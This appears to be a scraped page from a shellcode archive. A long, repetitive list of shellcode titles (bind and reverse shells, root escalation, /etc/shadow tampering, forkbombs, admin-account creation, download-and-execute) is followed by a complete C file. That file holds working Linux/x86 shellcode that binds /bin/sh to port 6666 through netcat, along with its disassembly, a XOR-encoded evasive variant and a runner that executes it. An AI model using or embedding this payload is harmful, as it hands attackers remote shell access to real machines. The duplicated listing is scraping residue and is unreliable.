b51e0f27d5
52 new exploits Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) (38 bytes) Linux/x86 - unlink(/etc/passwd) & exit() (35 bytes) Linux i686 - pacman -S <package> (default package: backdoor) (64 bytes) Linux i686 - pacman -R <package> (59 bytes) Linux i686 - pacman -S <package> (default package: backdoor) (64 bytes) Linux i686 - pacman -R <package> (59 bytes) JITed stage-0 shellcode JITed exec notepad Shellcode Win32 - JITed stage-0 shellcode Win32 - JITed exec notepad Shellcode Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes) JITed egg-hunter stage-0 shellcode Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes) Win32 - Mini HardCode WinExec&ExitProcess Shellcode (16 bytes) Windows - JITed egg-hunter stage-0 shellcode Win32/XP SP3 (RU) - WinExec+ExitProcess cmd shellcode (12 bytes) Linux/x86 - nc -lvve/bin/sh -p13377 shellcode Linux/x86 - polymorphic forkbombe - (30 bytes) Linux/x86 - forkbomb Linux/x86 - polymorphic forkbombe (30 bytes) Linux/x86 - forkbomb Linux/x86_64 - execve(_/bin/sh_); shellcode (30 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals (60 bytes) Linux/x86_64 - execve(_/bin/sh_); shellcode (30 bytes) Linux/x86 - sends _Phuck3d!_ to all terminals (60 bytes) Linux/x86 - polymorphic execve(_/bin/bash___-p__NULL) (57 bytes) Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); (42 bytes) Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes) Linux/x86 - execve(_/usr/bin/wget__ _aaaa_); (42 bytes) Linux/x86 - sys_execve(_/bin/sh__ _0__ _0_) with umask 16 (sys_umask(14)) (45 bytes) Linux/x86 - Disable randomize stack addresse (106 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83 Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes) Linux/x86 - Disable randomize stack addresse (106 bytes) Linux/x86 - pwrite(_/etc/shadow__ hash_ 32_ 8) Shellcode 83 Linux/x86 - alphanumeric Bomb FORK Shellcode (117 bytes) Linux/x86 - Shellcode Polymorphic - setuid(0) + chmod(_/etc/shadow__ 0666) Shellcode (61 bytes) Linux/x86 - kill all running process (11 bytes) Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes) Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes) Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) shellcode (45 bytes) Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (_/bin/sh_) shellcode (39 bytes) Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes) Linux/x86 - hard / unclean reboot (29 bytes) Linux/x86 - hard / unclean reboot (33 bytes) Linux/x86 - unlink _/etc/shadow_ shellcode (33 bytes) Linux/x86 - hard / unclean reboot (29 bytes) Linux/x86 - hard / unclean reboot (33 bytes) Linux/x86 - chown root:root /bin/sh shellcode (48 bytes) Linux/x86 - give all user root access when execute /bin/sh (45 bytes) Linux/x86 - chown root:root /bin/sh shellcode (48 bytes) Linux/x86 - give all user root access when execute /bin/sh (45 bytes) Linux/ARM - setuid(0) & kill(-1_ SIGKILL) (28 bytes) Linux/ARM - execve(_/bin/sh___/bin/sh__0) (30 bytes) Linux/ARM - polymorphic chmod(_/etc/shadow__ 0777) (84 bytes) Linux/ARM - chmod(_/etc/shadow__ 0777) Shellcode (35 bytes) Linux/ARM - Disable ASLR Security (102 bytes) Linux/x86 - bind shell port 64533 (97 bytes) Safari JS JITed shellcode - exec calc (ASLR/DEP bypass) Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass) Win32 - Write-to-file Shellcode Linux/x86_64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) (49 bytes) Linux/x86 - netcat bindshell port 8080 (75 bytes) Shellcode Checksum Routine (18 bytes) Win32 - Shellcode Checksum Routine (18 bytes) Win32/XP SP3 (TR) - Add Admin Account Shellcode (127 bytes) Win32/XP Pro SP3 (EN) 32-bit - add new local administrator (113 bytes) Win32 - add new local administrator (326 bytes) Win32/XP Pro SP3 (EN) 32-bit - add new local administrator (113 bytes) Win32 - add new local administrator (326 bytes) Win32 - speaking shellcode Linux/x86 - netcat bindshell port 6666 (69 bytes) DNS Reverse Download and Exec Shellcode Windows - DNS Reverse Download and Exec Shellcode Linux/x86_32 - ConnectBack with SSL connection (422 bytes) Linux/x86 - ConnectBack with SSL connection (422 bytes) Linux/x86 - egghunt shellcode (29 bytes) Linux/MIPS - execve /bin/sh (48 bytes) Linux/MIPS - add user(UID 0) with password (164 bytes) Linux/MIPS - execve /bin/sh (48 bytes) Linux/MIPS - add user(UID 0) with password (164 bytes) Linux/x86 - execve(/bin/dash) (42 bytes) Linux/x86 - chmod (777 /etc/passwd & /etc/shadow)_ Add New Root User (ALI/ALI) & Execute /bin/sh (378 bytes) Linux/x86 - Obfuscated Shellcode chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash (521 bytes) Linux/x86 - rmdir (37 bytes) Linux/MIPS - execve (36 bytes) Windows XP x86-64 - Download & execute (Generator) Linux/x86 - /etc/passwd Reader (58 bytes) Linux - execve /bin/sh (23 bytes) Linux/x86 - execve /bin/sh (23 bytes) Linux/x86/x86_64 - reverse_tcp Shellcode Linux x86 & x86_64 - reverse_tcp Shellcode Linux/x86/x86_64 - tcp_bind Shellcode Linux/x86/x86_64 - Read etc/passwd Shellcode Linux x86 & x86_64 - tcp_bind Shellcode Linux x86 & x86_64 - Read etc/passwd Shellcode .Net Framework - Execute Native x86 Shellcode Win32 .Net Framework - Execute Native x86 Shellcode
70 lines
2.7 KiB
Text
Executable file
70 lines
2.7 KiB
Text
Executable file
/*
|
|
** Title: Linux/x86 - netcat bindshell port 6666 - 69 bytes
|
|
** Date: 2011-04-20
|
|
** Author: Jonathan Salwan
|
|
**
|
|
** http://shell-storm.org
|
|
** http://twitter.com/jonathansalwan
|
|
**
|
|
** /usr/bin/netcat -ltp6666 -e/bin/sh
|
|
**
|
|
** 8048054 <.text>:
|
|
** 8048054: 31 c0 xor %eax,%eax
|
|
** 8048056: 50 push %eax
|
|
** 8048057: 68 74 63 61 74 push $0x74616374
|
|
** 804805c: 68 6e 2f 6e 65 push $0x656e2f6e
|
|
** 8048061: 68 72 2f 62 69 push $0x69622f72
|
|
** 8048066: 68 2f 2f 75 73 push $0x73752f2f
|
|
** 804806b: 89 e3 mov %esp,%ebx
|
|
** 804806d: 50 push %eax
|
|
** 804806e: 68 36 36 36 36 push $0x36363636
|
|
** 8048073: 68 2d 6c 74 70 push $0x70746c2d
|
|
** 8048078: 89 e2 mov %esp,%edx
|
|
** 804807a: 50 push %eax
|
|
** 804807b: 68 6e 2f 73 68 push $0x68732f6e
|
|
** 8048080: 68 2f 2f 62 69 push $0x69622f2f
|
|
** 8048085: 66 68 2d 65 pushw $0x652d
|
|
** 8048089: 89 e1 mov %esp,%ecx
|
|
** 804808b: 50 push %eax
|
|
** 804808c: 51 push %ecx
|
|
** 804808d: 52 push %edx
|
|
** 804808e: 53 push %ebx
|
|
** 804808f: 89 e6 mov %esp,%esi
|
|
** 8048091: b0 0b mov $0xb,%al
|
|
** 8048093: 89 f1 mov %esi,%ecx
|
|
** 8048095: 31 d2 xor %edx,%edx
|
|
** 8048097: cd 80 int $0x80
|
|
**
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <string.h>
|
|
|
|
char SC[] = "\x31\xc0\x50\x68\x74\x63\x61\x74\x68\x6e\x2f"
|
|
"\x6e\x65\x68\x72\x2f\x62\x69\x68\x2f\x2f\x75"
|
|
"\x73\x89\xe3\x50\x68\x36\x36\x36\x36\x68\x2d"
|
|
"\x6c\x74\x70\x89\xe2\x50\x68\x6e\x2f\x73\x68"
|
|
"\x68\x2f\x2f\x62\x69\x66\x68\x2d\x65\x89\xe1"
|
|
"\x50\x51\x52\x53\x89\xe6\xb0\x0b\x89\xf1\x31"
|
|
"\xd2\xcd\x80";
|
|
|
|
|
|
/* SC polymorphic - XOR 19 - 93 bytes */
|
|
char SC_ENC[] = "\xeb\x11\x5e\x31\xc9\xb1\x45\x80\x74\x0e"
|
|
"\xff\x13\x80\xe9\x01\x75\xf6\xeb\x05\xe8"
|
|
"\xea\xff\xff\xff\x22\xd3\x43\x7b\x67\x70"
|
|
"\x72\x67\x7b\x7d\x3c\x7d\x76\x7b\x61\x3c"
|
|
"\x71\x7a\x7b\x3c\x3c\x66\x60\x9a\xf0\x43"
|
|
"\x7b\x25\x25\x25\x25\x7b\x3e\x7f\x67\x63"
|
|
"\x9a\xf1\x43\x7b\x7d\x3c\x60\x7b\x7b\x3c"
|
|
"\x3c\x71\x7a\x75\x7b\x3e\x76\x9a\xf2\x43"
|
|
"\x42\x41\x40\x9a\xf5\xa3\x18\x9a\xe2\x22"
|
|
"\xc1\xde\x93";
|
|
|
|
int main(void)
|
|
{
|
|
fprintf(stdout,"Length: %d\n",strlen(SC));
|
|
(*(void(*)()) SC)();
|
|
return 0;
|
|
}
|